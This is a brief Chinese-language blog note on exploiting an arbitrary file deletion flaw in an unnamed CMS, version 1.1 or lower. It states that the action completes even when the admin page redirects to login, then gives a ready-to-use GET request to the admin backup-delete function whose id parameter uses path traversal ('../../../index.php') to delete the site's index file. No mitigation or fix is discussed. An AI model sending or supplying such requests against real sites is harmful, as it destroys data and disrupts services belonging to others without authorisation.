【笔记】某CMS任意文件删除漏洞利用

前言

某CMS任意文件删除漏洞利用

漏洞利用前提

  • 版本 <= 1.1

漏洞利用

  • 即便跳转了登录页面,也会完成代码的执行
request
1
GET http://127.0.0.1:80/admin/?mold=safe&part=backup&func=delete&id=../../../index.php

完成